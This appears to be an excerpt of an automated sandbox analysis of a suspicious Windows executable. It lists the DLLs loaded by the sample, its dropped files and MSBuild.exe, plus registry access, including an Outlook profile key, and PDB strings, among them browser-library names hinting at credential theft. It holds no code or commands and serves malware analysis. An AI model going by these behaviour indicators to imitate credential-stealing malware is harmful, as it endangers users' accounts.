Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: sx8RE6LbG0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: sx8RE6LbG0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: sx8RE6LbG0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: sx8RE6LbG0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: sx8RE6LbG0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: sx8RE6LbG0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: sx8RE6LbG0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: nss3.pdb@ source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296210614.0000021731FC0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296762074.0000021732190000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: wntdll.pdb source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
Source: Binary string: mozglue.pdb source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000003.00000000.2099921681.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000002.2166899823.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000000.2585114842.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000002.2691006504.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318821153.0000021738120000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243252016.0000021717B20000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
